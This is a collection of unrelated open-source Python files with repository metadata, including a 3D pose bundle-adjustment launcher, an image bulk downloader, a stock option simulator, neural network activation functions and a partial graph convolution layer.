deniseIO.check_domain_decomp(para)
deniseIO.write_denise_para(para)
acqObj.write_acq(basedir)
dict_mfile = {'vp': vptest, 'vs': vstest, 'rho': rhotest}
write_mfile(para['MFILE'], dict_mfile, basedir)
| [
"[email protected]"
] | |
0b0864d7bcd9a8bbbafc7d85f9f8e90a96bd8a47 | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /metapose/launch_anipose.py | 928740a6681f6e2cee01b6aa52cdd923c73d23b3 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 7,366 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch script for running a classical bundle adjustment baseline."""
from absl import app
from absl import flags
from aniposelib import cameras as anipose_cameras
import cv2
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds
from metapose import data_utils
from metapose import inference_time_optimization as inf_opt
_INPUT_PATH = flags.DEFINE_string('input_path', '', '')
_OUTPUT_PATH = flags.DEFINE_string('output_path', None, '')
_DEBUG_FIRST_N = flags.DEFINE_integer('debug_first_n', None,
'read only first n records')
_CAM_SUBSET = flags.DEFINE_list('cam_subset', list(map(str, range(4))), '')
_ADJUST_CAM = flags.DEFINE_bool('adjust_cam', True,
'true - BA on cams, false - triangulation')
_GT_INIT = flags.DEFINE_bool('gt_init', True, '')
_GT_HT = flags.DEFINE_bool('gt_ht', False, '')
flags.mark_flag_as_required('output_path')
def get_anipose_gt_camera(data_rec, cam_id):
"""Get AniPose.Camera with GT initialization."""
cam_pose3d, cam_rot, cam_intr = [
data_rec[x] for x in ['cam_pose3d', 'cam_rot', 'cam_intr']
]
rot_mat = cam_rot[cam_id].numpy()
t = cam_pose3d[cam_id].numpy()
rvec = cv2.Rodrigues(rot_mat)[0]
tvec = np.dot(rot_mat, -t)
f = np.mean(cam_intr[cam_id][:2])
k1 = 0
params = np.concatenate([rvec.ravel(), tvec.ravel(), [f, k1]])
camera = anipose_cameras.Camera()
camera.set_params(params)
return camera
def perturb_anipose_camera(cam):
ani_params = cam.get_params()
new_ani_params = np.concatenate([np.random.normal(size=6), ani_params[6:]])
cam.set_params(new_ani_params)
def get_pppx_pose2d_pred_and_gt(data_rec, cam_id):
"""Get 2D pose GT and mean predicted per-view 2D pose in pixels."""
bbox = data_rec['bboxes'][cam_id].numpy()
size = np.maximum(bbox[1] - bbox[0], bbox[3] - bbox[2])
origin = np.stack([bbox[2], bbox[0]], axis=-1)
pose2d_mean_pred = data_rec['pose2d_pred'][cam_id].numpy()
pose2d_gt = data_rec['pose2d_repr'][cam_id].numpy()
pp = data_rec['cam_intr'][cam_id][2:].numpy()
pose2d_mean_pred_pix = pose2d_mean_pred * size + origin - pp
pose2d_gt_pix = pose2d_gt * size + origin - pp
return pose2d_mean_pred_pix, pose2d_gt_pix
def run_anipose_bundle_adjustment(data_rec,
ba_cam=True,
gt_init=True,
gt_ht=False):
"""Run AniPose bundle adjustment."""
n_cam = data_rec['cam_rot'].shape[0]
cameras = [get_anipose_gt_camera(data_rec, i) for i in range(n_cam)]
if not gt_init:
for cam in cameras:
perturb_anipose_camera(cam)
gt_idx = 1 if gt_ht else 0
pose2d_preds = np.array(
[get_pppx_pose2d_pred_and_gt(data_rec, i)[gt_idx] for i in range(n_cam)])
camera_group = anipose_cameras.CameraGroup(cameras)
if ba_cam:
error = camera_group.bundle_adjust_iter(pose2d_preds)
pose3d_pred = camera_group.triangulate(pose2d_preds)
ani_params_cam0 = camera_group.cameras[0].get_params()
rot_mat_cam0 = cv2.Rodrigues(ani_params_cam0[:3])[0]
pose3d_pred_cam0 = pose3d_pred @ rot_mat_cam0.T
all_ani_params = np.array([c.get_params() for c in camera_group.cameras])
return pose3d_pred_cam0, all_ani_params, error
def pmpje(pose3d_pred, pose3d_gt):
aligned_pose = inf_opt.align_aba(pose3d_pred, pose3d_gt)[0]
diff = aligned_pose - pose3d_gt
return tf.reduce_mean(tf.linalg.norm(diff, axis=-1), axis=-1)
def center_pose(pose3d):
return pose3d - tf.reduce_mean(pose3d, axis=0, keepdims=True)
def nmpje_pck(pose3d_pred_cam0, pose3d_gt_cam0, threshold=150):
"""Compute Normalized MPJE and PCK metrics."""
norm = tf.linalg.norm
pose3d_gt_cent = center_pose(pose3d_gt_cam0)
pose3d_pred_cent = center_pose(pose3d_pred_cam0)
scale_factor = norm(pose3d_gt_cent) / norm(pose3d_pred_cent)
pose3d_pred_cent_scaled = scale_factor * pose3d_pred_cent
diff = pose3d_gt_cent - pose3d_pred_cent_scaled
err = errs = tf.linalg.norm(diff, axis=-1)
nmpje = tf.reduce_mean(err, axis=-1)
pck = tf.reduce_mean(tf.cast(errs < threshold, tf.float32)) * 100
return nmpje, pck
def run_and_evaluate(data_rec, cam_subset, adjust_cam, gt_init, gt_ht):
"""Run AniPose bundle adjustment and compute metrics."""
data_rec = inf_opt.convert_rec_pose2d_to_bbox_axis(data_rec)
data_rec = inf_opt.take_camera_subset(data_rec, cam_subset)
pose3d_gt = data_rec['pose3d'].numpy()
pose3d_gt_cam0 = (pose3d_gt @ tf.transpose(data_rec['cam_rot'][0]))
pose3d_pred_cam0, ani_params_pred, ba_error = run_anipose_bundle_adjustment(
data_rec, adjust_cam, gt_init, gt_ht)
errs = np.array([
ba_error,
pmpje(pose3d_pred_cam0, pose3d_gt),
*nmpje_pck(pose3d_pred_cam0, pose3d_gt_cam0)
])
output = {
**data_rec,
'pose3d_pred_cam0': pose3d_pred_cam0,
'ani_params_pred': ani_params_pred,
'ba_pmpje_nmpje_pck_errs': errs,
}
output_np = {k: np.array(v) for k, v in output.items()}
return output_np
def main(_):
cam_subset = list(map(int, _CAM_SUBSET.value))
n_cam = len(cam_subset)
output_shape_dtype = {
# anipose results
'pose3d_pred_cam0': ([17, 3], tf.float64),
'ani_params_pred': ([n_cam, 8], tf.float64),
'ba_pmpje_nmpje_pck_errs': ([
4,
], tf.float64),
# input data
'pose3d': ([17, 3], tf.float64),
'cam_pose3d': ([n_cam, 3], tf.float64),
'cam_rot': ([n_cam, 3, 3], tf.float64),
'cam_intr': ([n_cam, 4], tf.float64),
'cam_kd': ([n_cam, 5], tf.float64),
'pose2d_gt': ([n_cam, 17, 2], tf.float64),
'pose2d_repr': ([n_cam, 17, 2], tf.float64),
'heatmaps': ([n_cam, 17, 4, 4], tf.float64),
# note! pose2d_pred is actually the "mean heatmap" 2D pred
'pose2d_pred': ([n_cam, 17, 2], tf.float64),
'keys': ([n_cam], tf.string),
'bboxes': ([n_cam, 4], tf.int32),
'pose3d_epi_pred': ([n_cam, 17, 3], tf.float32),
# config
'cam_subset': ([n_cam], tf.int32),
}
output_spec = tfds.features.FeaturesDict({
k: tfds.features.Tensor(shape=s, dtype=d)
for k, (s, d) in output_shape_dtype.items()
})
ds = data_utils.read_tfrec_feature_dict_ds(_INPUT_PATH.value)
if _DEBUG_FIRST_N.value is not None:
ds = ds.take(_DEBUG_FIRST_N.value)
dataset = []
for _, data_rec in ds:
opt_stats = run_and_evaluate(data_rec, cam_subset, _ADJUST_CAM.value,
_GT_INIT.value, _GT_HT.value)
print('ba / pmpje / nmpje / pck', opt_stats['ba_pmpje_nmpje_pck_errs'])
dataset.append(opt_stats)
data_utils.write_tfrec_feature_dict_ds(dataset, output_spec,
_OUTPUT_PATH.value)
if __name__ == '__main__':
app.run(main)
| [
"[email protected]"
] | |
a8572ed76842012079600e505ff96ed2f3ad217c | 4e79c63941476046816d937d4e8f90d26c05e748 | /main_bulk.py | c098c9d204231295e56f6df7995e53d5981cb4fd | [] | no_license | ouromoros/booru_downloader | a41963c8d0c9317d9934bf5c251b44c4f7917440 | b86b0f63d3a0fb001bc601534fe2434940a95955 | refs/heads/master | 2021-04-03T06:54:00.869390 | 2018-10-22T10:35:15 | 2018-10-22T10:35:15 | 124,854,821 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | import requests
import time
from bs4 import BeautifulSoup
import os
from optparse import OptionParser
import datetime
import threading
# paramaters to be defined
website = 'http://konachan.net/post' # 'http://lolibooru.moe/post'
download_path = '/home/chaos/opt/pip/white'
tags = ''
pages = 1
image_count = 1
class dThread(threading.Thread):
def __init__(self, fadr):
threading.Thread.__init__(self)
self.fadr = fadr
def run(self):
name = requests.utils.unquote(self.fadr[self.fadr.rfind('/') + 1:])
self.iname = name
if os.path.isfile(download_path + '/' + name):
return
if not os.path.isdir(download_path):
os.mkdir(download_path)
print('Downloading ' + name[name.rfind('/') + 1:])
content = requests.get(self.fadr)
with open(download_path + '/' + name, 'wb') as f:
f.write(content.content)
def dpage(page):
main_page = requests.get(website, params={'tags': tags, 'page': page})
soup = BeautifulSoup(main_page.text, 'html.parser')
images = soup.find_all('a', class_='directlink')
#soup.find_all('a', {'class': 'directlink smallimg'})
threads = []
for img in images:
t = dThread('http:' + img['href'])
t.start()
threads.append(t)
time.sleep(0.5)
for t in threads:
t.join()
print('Fnished downloading {}'.format(t.iname))
def arguments():
parser = OptionParser()
parser.add_option("-t", "--tag", help="the tags of picture you want")
parser.add_option('-p', '--page', help='pages of images you want')
parser.add_option('-u', '--url', help='url of the target website')
parser.add_option(
'-d', '--directory', help='directory where pictures are to be stored')
return parser.parse_args()
if __name__ == '__main__':
# processing args
(options, args) = arguments()
# download_path += ('/' + str(datetime.date.today()))
if options.tag:
tags = options.tag
if options.page:
pages = int(options.page)
if options.url:
website = options.url
if options.directory:
download_path = options.directory
# Downloading files
for i in range(pages):
dpage(i + 1)
| [
"[email protected]"
] | |
ad2330d8afc9b51696c93c8c657b6ae40639a143 | 890657e5e5d0668fdb7015abc3ea78313b9abcbf | /simStock.py | c4122c978895211fae5145f404e84607235e2269 | [] | no_license | grsmith1943/econophysics | 4d3f72f1b4761364136978c94614895c7cc0e325 | eef63511dbabec637272368bbb7a47a3b4caa670 | refs/heads/master | 2021-06-14T03:33:44.307066 | 2017-03-06T05:40:17 | 2017-03-06T05:40:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,685 | py | import sys
import numpy as np
import matplotlib.pyplot as plt
# simulates the path of a stock and outputs the estimated call and put prices
def simStock(r=0.01, mu=0.01, sigma=0.01, T=60, S=15, X=15, N=1000, n=30):
dt = T/N
calls, puts = [None]*n, [None]*n
for path in range(n):
pathPrice = [None] * N
pathPrice[0] = S
for j in range(N - 1):
epsilon = np.random.normal()
dS = pathPrice[j] * (mu*dt + sigma*epsilon*dt**0.5)
pathPrice[j+1] = pathPrice[j] + dS
#get the call and put price for this particular option
calls[path] = np.exp(-1*r*T) * max(pathPrice[-1] - X, 0)
puts[path] = np.exp(-1*r*T) * max(X - pathPrice[-1], 0)
plt.plot(pathPrice)
callPrice = np.mean(calls)
putPrice = np.mean(puts)
print("Given that the option's strike price is %f and days till expiry is %i:"%(X,T))
print("The optimal call price:", callPrice)
print("The optimal put price: ", putPrice)
#opens the window that actually displays the plots on top of each other
plt.xlabel("Day")
plt.ylabel("Asset price (USD)")
plt.show()
def main():
r = float(input("Risk-free interest rate: "))
mu = float(input("Asset's daily return rate: "))
sigma = float(input("Volatility of asset: "))
T = float(input("Days till this option's expiry date: "))
S = float(input("Asset's current price: "))
X = float(input("This option's strike price: "))
N = int(input("Time steps per simulation: "))
n = int(input("Number of simulation paths: "))
simStock(r=r, mu=mu, sigma=sigma, T=T, S=S, X=X, N=N, n=n)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
e7e8f4cff06e14fcbc56bac03f97f74a51c810d3 | c1ed05a3c546d3580ac0bb0e66bcaddaf8d78b28 | /app/models/time_utils.py | 584226049bdc48b57f288886692a59ca9c223514 | [] | no_license | lelandbatey/whereIAm | 382108fd296ab69e97ac8bf6a11a3aaf7cef7de4 | 66c071cce541f65bfcf1a1865948e5a4abe55601 | refs/heads/master | 2022-08-07T17:10:15.354394 | 2022-07-12T00:50:16 | 2022-07-12T00:50:16 | 17,266,937 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,170 | py | from __future__ import print_function
import time
import datetime
# Test
def simplefmt_in_pdt_to_utc_epoch(moment):
"""Converts simple format string as if taken in PDT to UTC.
This function is good for helping a developer in PDT query times in a
format they're comfortable with.
"""
t = simplefmt_to_datetime(moment)
# Add 7 hours
t += datetime.timedelta(0, 25200)
return datetime_to_epoch(t)
def datetime_to_oddformat(moment):
"""Converts datetime object to format %Y-%m-%dT%H:%M:%S.%fZ"""
return datetime.datetime.strftime(moment, "%Y-%m-%dT%H:%M:%S.%fZ")
def oddformat_to_datetime(odd):
"""Converts string in %Y-%m-%dT%H:%M:%S.%fZ to datetime"""
return datetime.datetime.strptime(odd, "%Y-%m-%dT%H:%M:%S.%fZ")
def simplefmt_to_datetime(moment):
"""Converts string in %H:%M:%S %d-%m-%y to datetime"""
return datetime.datetime.strptime(moment, "%H:%M:%S %d-%m-%y")
def epoch_to_datetime(epoch):
"""Converts an epoch timestamp to datetime."""
return datetime.datetime.fromtimestamp(epoch)
def datetime_to_epoch(indate):
"""Converts a datetime object to an epoch timestamp."""
return (indate - datetime.datetime(1970, 1, 1)).total_seconds()
| [
"[email protected]"
] | |
6e85b271ef79c17d8c18fcf939716b7ef7bf09cc | 47dd1fe92dd3b918881171c8159c2da931a43cd0 | /erasing_background.py | 8c0238257df9f08f233e52a1c507257cab098a12 | [] | no_license | HCl3646/Ball-Recognizing | eef38c40e0ee3978c53ce61e654b91a14656f684 | 4707f93800b2e08401fc237b3b68d6db2e571ff1 | refs/heads/main | 2023-07-16T14:35:22.326111 | 2021-08-25T10:00:45 | 2021-08-25T10:00:45 | 390,645,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | import cv2
import numpy as np
import sys
import math
def afterFindCircle(src, circle):
for y in range(len(src)):
for x in range(len(src[y])):
count = 0
for cnt in circle:
formula = (y - cnt[0][1]) ** 2 + (x - cnt[0][0]) ** 2
if formula > (cnt[1])**2:
count += 1
if count == len(circle):
src[y][x] = 0
return src
def BackGroundHSV(img, low, high):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv = cv2.GaussianBlur(hsv, (0, 0), 1.0)
color_lo = np.array(low)
color_hi = np.array(high)
mask = cv2.inRange(hsv, color_lo, color_hi)
img[mask > 0] = [0, 0, 0]
return img | [
"[email protected]"
] | |
e58c5f71e7e0260f7e30521044465cd8a9326093 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02778/s173819636.py | 68ef04cad2b1b6d8ccded1faecc1b0de046a7534 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46 | py | S=input()
l=len(S)
X='x'*l
X=str(X)
print(X) | [
"[email protected]"
] | |
7a3d0337ce71f1be2261bb1b53e4460a25995c0c | a142942a91142f7139a74c3843527220caefc7e0 | /model/pawns/behaviors/moving_behaviors/explorer.py | d8955a298dbd9d77476d5efc591ca34e7ed19343 | [] | no_license | ME-JAD/projet-python-les-roms | 2ae2c6c703e0c575d4cafba47845c38bd91cf302 | 7c006a1c887de2b88feb658719dc28e17de1be09 | refs/heads/main | 2023-06-26T00:35:21.610800 | 2021-07-26T08:07:21 | 2021-07-26T08:07:21 | 369,602,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from model.pawns.behaviors.moving_behaviors.anarchic_abstract import AnarchicAbstract
class Explorer(AnarchicAbstract):
def __init__(self):
super().__init__(0.04)
def to_string(self) -> str:
return "explorer"
| [
"[email protected]"
] | |
d183fc7c9346569cfd30247f70f6d734d228465a | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/abc066/B/4898222.py | d42241014312de127729cea09494cd0e85291565 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | s = input()
found = 0
for i in range(len(s)):
if i % 2 == 0 and i >= 2:
t = s[:i//2]
t2 = s[i//2:i]
if t == t2:
found = i
print(found) | [
"[email protected]"
] | |
f4f5cc0bfddd33da8f868b066af7b61019f05d75 | 0f2a9eab881c471e32b9467280633a2649519861 | /tensorx/activation.py | c8e2efa1af2e090d7128861133dc4ba83f3aefe0 | [
"Apache-2.0"
] | permissive | mkdir700/tensorx | 97720423109ffcd5cd50c21909051e31ffca07d1 | 11d7727b055fbee29e122ffbfc7a39057aeeae40 | refs/heads/master | 2023-03-15T19:32:31.002867 | 2021-01-16T21:20:37 | 2021-01-16T21:22:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,062 | py | import tensorflow as tf
import math
from tensorx.utils import as_tensor
def identity(x, name: str = None) -> tf.Tensor:
""" Identity function
Returns a tensor with the same content as the input tensor.
Args:
x (`Tensor`): The input tensor.
name (`str`): name for this op
Returns:
tensor (`Tensor`): of the same shape, type and content of the input tensor.
"""
return tf.identity(x, name=name)
def sigmoid(x):
""" Sigmoid function
Element-wise sigmoid function, defined as:
$$
f(x) = \\frac{1}{1 + \\exp(-x)}
$$
Args:
x (`Tensor`): A tensor or variable.
Returns:
A tensor (`Tensor`): with the result of applying the sigmoid function to the input tensor.
"""
return tf.nn.sigmoid(x)
def hard_sigmoid(x, name="hard_sigmoid"):
""" Hard Sigmoid
Segment-wise linear approximation of sigmoid. (Faster than sigmoid)
!!! note
Approximates the sigmoid function in 3 parts: 0, scaled linear, 1.
returns `0.` if `x < -2.5`, `1.` if `x > 2.5`.
In `-2.5 <= x <= 2.5`, returns `0.2 * x + 0.5`.
Args:
x (`Tensor`): input tensor
name (`str`): name for this op
Returns:
tensor (`Tensor): the result of applying an approximated element-wise sigmoid to the input tensor
"""
x = as_tensor(x)
with tf.name_scope(name):
slope = as_tensor(0.2, x.dtype)
shift = as_tensor(0.5, x.dtype)
x = (slope * x) + shift
zero = as_tensor(0., x.dtype)
one = as_tensor(1., x.dtype)
x = tf.clip_by_value(x, zero, one)
return x
def tanh(x):
""" Hyperbolic tangent (tanh) function.
The element-wise hyperbolic tangent function is essentially a rescaled
sigmoid function. The sigmoid function with range $[0,1]$ is defined as follows:
$$
f(x) = \\frac{1}{1 + \\exp(-x)}
$$
the hyperbolic tangent is a re-scaled function such that it's outputs range $[-1,1]$ defined as:
$$
tanh(x) = 2f(2x)−1
$$
which leads us to the standard definition of hyperbolic tangent
$$
tanh(x)=\\frac{e^{x}-e^{-x}}{e^{x}+e^{-x}}
$$
Args:
x (`Tensor`): an input tensor
Returns:
tensor (`Tensor`): a tensor with the result of applying the element-wise hyperbolic tangent to the input
"""
return tf.nn.tanh(x)
def relu(x):
""" relu activation
A Rectifier linear unit [1] is defined as:
$$
f(x)= \\max(0, x)
$$
!!! cite "References"
1. (Vinod & Hinton, 2010) [Rectified linear units improve restricted boltzmann machines](https://www.cs.toronto.edu/~fritz/absps/reluICML.pdf)
Args:
x (`Tensor`): input tensor
Returns:
tensor (`Tensor`) that results in element-wise rectifier applied to x.
"""
return tf.nn.relu(x)
def elu(x, alpha=1.0):
""" elu activation
An Exponential Linear Unit (ELU) is defined as:
$$
f(x)=\\left\\{\\begin{array}{cc}x & x>0 \\\\
\\alpha \\cdot \\left(e^{x}-1\\right) & x<=0
\\end{array}\\right\\}
$$
!!! cite "References"
1. (Clevert et al. 2015) [Fast and accurate deep network learning by exponential linear units (ELUs)](https://arxiv.org/abs/1511.07289).
Args:
x (`Tensor`): an input tensor
alpha (`float`): A scalar, slope of positive section.
Returns:
tensor (`Tensor`): resulting from the application of the elu activation to the input tensor.
"""
y = tf.nn.elu(x)
if alpha == 1:
return y
else:
return tf.where(x > 0, y, x * y)
def gelu(x, approximate: bool = True) -> tf.Tensor:
""" Gaussian Error Linear Unit.
Computes gaussian error linear:
`0.5 * x * (1 + tanh(sqrt(2 / pi) * (x + 0.044715 * x^3)))` or
`x * P(X <= x) = 0.5 * x * (1 + erf(x / sqrt(2)))`, where P(X) ~ N(0, 1),
depending on whether approximation is enabled.
!!! cite "References"
1. [Gaussian Error Linear Units (GELUs)](https://arxiv.org/abs/1606.08415)
2. [BERT](https://arxiv.org/abs/1810.04805).
Args:
x (`Tensor`): Must be one of the following types:
`float16`, `float32`, `float64`.
approximate (bool): whether to enable approximation.
Returns:
tensor (`Tensor`): with the same type as `x`
"""
x = tf.convert_to_tensor(x)
if approximate:
pi = tf.cast(tf.constant(math.pi), x.dtype)
coefficient = tf.cast(0.044715, x.dtype)
return 0.5 * x * (1.0 + tf.tanh(tf.sqrt(2.0 / pi) * (x + coefficient * tf.pow(x, 3))))
else:
return 0.5 * x * (1.0 + tf.math.erf(x / tf.cast(tf.sqrt(2.0), x.dtype)))
def selu(x):
""" The Scaled Exponential Linear Unit (SELU)
`scale * x` if `x > 0` and `scale * alpha * (exp(x) - 1)` if `x < 0`
where alpha and scale are pre-defined constants (`alpha = 1.67326324` and `scale = 1.05070098`).
The values of alpha and scale are chosen so that the mean and variance of the inputs are preserved
between two consecutive layers as long as the weights are initialized correctly
(see `variance_scaling_init`).
To be used together with initializer = tf.variance_scaling_initializer(factor=1.0, mode='FAN_IN').
For correct dropout, use tf.contrib.nn.alpha_dropout.
!!! cite "References"
1. [Self-Normalizing Neural Networks](https://arxiv.org/pdf/1706.02515.pdf)
Args:
x (`Tensor`): input tensor
Returns:
tensor (`Tensor`): results in `scale * x` if `x > 0` and `scale * alpha * (exp(x) - 1)` if `x < 0`
"""
return tf.nn.selu(x)
def softmax(x, axis=None, name=None):
""" softmax activation
Softmax activation function, is equivalent to `softmax = tf.exp(logits) / tf.reduce_sum(tf.exp(logits), axis)`
and it is defined as:
$$
\\sigma(\\mathbf{z})_{i}=\\frac{e^{z_{i}}}{\\sum_{j=1}^{K} e^{z_{j}}}
$$
Args:
x (`Tensor`): input tensor
axis (`int`): the dimension softmax would be performed on. The default is -1 which indicates the last dimension.
name (`str`): name for this op
Returns:
tensor (`Tensor`): output resulting from the application of the softmax function to the input tensor
"""
return tf.nn.softmax(x, axis=axis, name=name)
def sparsemax(logits, name: str = None) -> tf.Tensor:
"""Computes the sparsemax activation function [1]
For each batch `i` and class `j` we have
sparsemax[i, j] = max(logits[i, j] - tau(logits[i, :]), 0)
References:
[1]: https://arxiv.org/abs/1602.02068
Args:
logits (`Tensor`): tensor with dtype: `half`, `float32`,`float64`.
name (`str`): A name for the operation (optional).
Returns:
tensor (`Tensor`): with the same type as the input logits.
"""
with tf.name_scope(name, "sparsemax"):
logits = tf.convert_to_tensor(logits, name="logits")
obs = tf.shape(logits)[0]
dims = tf.shape(logits)[1]
z = logits - tf.reduce_mean(logits, axis=1)[:, tf.newaxis]
# sort z
z_sorted, _ = tf.nn.top_k(z, k=dims)
# calculate k(z)
z_cumsum = tf.cumsum(z_sorted, axis=1)
k = tf.range(
1, tf.cast(dims, logits.dtype) + 1, dtype=logits.dtype)
z_check = 1 + k * z_sorted > z_cumsum
# because the z_check vector is always [1,1,...1,0,0,...0] finding the
# (index + 1) of the last `1` is the same as just summing the number of 1.
k_z = tf.reduce_sum(tf.cast(z_check, tf.int32), axis=1)
# calculate tau(z)
indices = tf.stack([tf.range(0, obs), k_z - 1], axis=1)
tau_sum = tf.gather_nd(z_cumsum, indices)
tau_z = (tau_sum - 1) / tf.cast(k_z, logits.dtype)
# calculate p
return tf.maximum(
tf.cast(0, logits.dtype), z - tau_z[:, tf.newaxis])
__all__ = [
"identity",
"sigmoid",
"hard_sigmoid",
"tanh",
"relu",
"selu",
"elu",
"gelu",
"softmax",
"sparsemax"
]
| [
"[email protected]"
] | |
30fee447c48fbadf60c4992516d343c3172117ad | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/1920.py | 90cfffa52cf142046f944f67dd669ef10263e345 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | import sys
cases = int(sys.stdin.readline())
for i in range(1,cases+1):
r1 = int(sys.stdin.readline())
board1 = []
for j in range(4):
board1.append(set(sys.stdin.readline().strip().split()))
r2 = int(sys.stdin.readline())
board2 = []
for j in range(4):
board2.append(set(sys.stdin.readline().strip().split()))
solutions = board1[r1-1] & board2[r2-1]
if len(solutions) == 0:
print("Case #%s: Volunteer cheated!" % i)
elif len(solutions) == 1:
print("Case #%s: %s" % ( i, solutions.pop() ))
else:
print("Case #%s: Bad magician!" % i)
| [
"[email protected]"
] | |
6edd0b38fb67914d917cc619077312985109a170 | 94eed60e05689e25f9070e80ad7e4fc3092d9df4 | /Languages/Python/python_study_3/page10/script.py | 8fdc9c00a26f834116e701e6e8cdaaafd65dbe91 | [
"MIT"
] | permissive | myarist/Progate | 0998e79f786db7a93ebd7488494427c3156729c7 | 0132583c989b5ec1805d4de1a6f6861586cf152e | refs/heads/main | 2023-05-09T05:52:12.476226 | 2021-06-07T21:26:48 | 2021-06-07T21:26:48 | 363,348,949 | 13 | 17 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | def validate(hand):
if hand < 0 or hand > 2:
return False
return True
def print_hand(hand, name='Tamu'):
hands = ['Batu', 'Kertas', 'Gunting']
print(name + ' memilih: ' + hands[hand])
print('Memulai permainan Batu Kertas Gunting!')
player_name = input('Masukkan nama Anda: ')
print('Pilih tangan: (0: Batu, 1: Kertas, 2: Gunting)')
player_hand = int(input('Masukkan nomor (0-2): '))
if validate(player_hand):
# Tetapkan 1 ke variable computer_hand
computer_hand = 1
print_hand(player_hand, player_name)
# Panggil function print_hand dengan computer_hand dan 'Komputer' sebagai argument
print_hand(computer_hand, 'Komputer')
else:
print('Mohon masukkan nomor yang benar')
| [
"[email protected]"
] | |
1505ecdc491bd9721b4650ce6eda55cdbee0446a | fdefd1f4b402620d7a9cc1f5ca8ed522c54bec4a | /torch_geometric/nn/conv/dna_conv.py | 2b90319e7c9fa0d0e6415824ba077d9d74642c10 | [
"MIT"
] | permissive | Lotayou/pytorch_geometric | 75f9ee187503fed9b70a800e5d768ecb91719d9f | 09ef8e3a510de3336f092a5dc1ede290b1c5cdb8 | refs/heads/master | 2020-05-07T22:24:52.701826 | 2019-04-12T05:24:52 | 2019-04-12T05:24:52 | 174,668,900 | 1 | 0 | MIT | 2019-03-09T08:36:42 | 2019-03-09T08:36:41 | null | UTF-8 | Python | false | false | 9,892 | py | from __future__ import division
import math
import torch
from torch import Tensor
from torch.nn import Parameter
import torch.nn.functional as F
from torch_geometric.nn.conv import MessagePassing, GCNConv
from ..inits import uniform, kaiming_uniform
class Linear(torch.nn.Module):
def __init__(self, in_channels, out_channels, groups=1, bias=True):
super(Linear, self).__init__()
assert in_channels % groups == 0 and out_channels % groups == 0
self.in_channels = in_channels
self.out_channels = out_channels
self.groups = groups
self.weight = Parameter(
Tensor(groups, in_channels // groups, out_channels // groups))
if bias:
self.bias = Parameter(torch.Tensor(out_channels))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
kaiming_uniform(self.weight, fan=self.weight.size(1), a=math.sqrt(5))
uniform(self.weight.size(1), self.bias)
def forward(self, src):
# Input: [*, in_channels]
# Output: [*, out_channels]
if self.groups > 1:
size = list(src.size())[:-1]
src = src.view(-1, self.groups, self.in_channels // self.groups)
src = src.transpose(0, 1).contiguous()
out = torch.matmul(src, self.weight)
out = out.transpose(1, 0).contiguous()
out = out.view(*size, self.out_channels)
else:
out = torch.matmul(src, self.weight.squeeze(0))
if self.bias is not None:
out += self.bias
return out
def __repr__(self): # pragma: no cover
return '{}({}, {}, groups={}, bias={})'.format(
self.__class__.__name__, self.in_channels, self.out_channels,
self.groups, self.bias is not None)
def restricted_softmax(src, dim=-1, margin=0):
src_max = torch.clamp(src.max(dim=dim, keepdim=True)[0], min=0)
out = (src - src_max).exp()
out = out / (out.sum(dim=dim, keepdim=True) + (margin - src_max).exp())
return out
class Attention(torch.nn.Module):
def __init__(self, dropout=0):
super(Attention, self).__init__()
self.dropout = dropout
def forward(self, query, key, value):
# Query: [*, query_entries, dim_k]
# Key: [*, key_entries, dim_k]
# Value: [*, key_entries, dim_v]
# Output: [*, query_entries, dim_v]
assert query.dim() == key.dim() == value.dim() >= 2
assert query.size(-1) == key.size(-1)
assert key.size(-2) == value.size(-2)
# Score: [*, query_entries, key_entries]
score = torch.matmul(query, key.transpose(-2, -1))
score = score / math.sqrt(key.size(-1))
score = restricted_softmax(score, dim=-1)
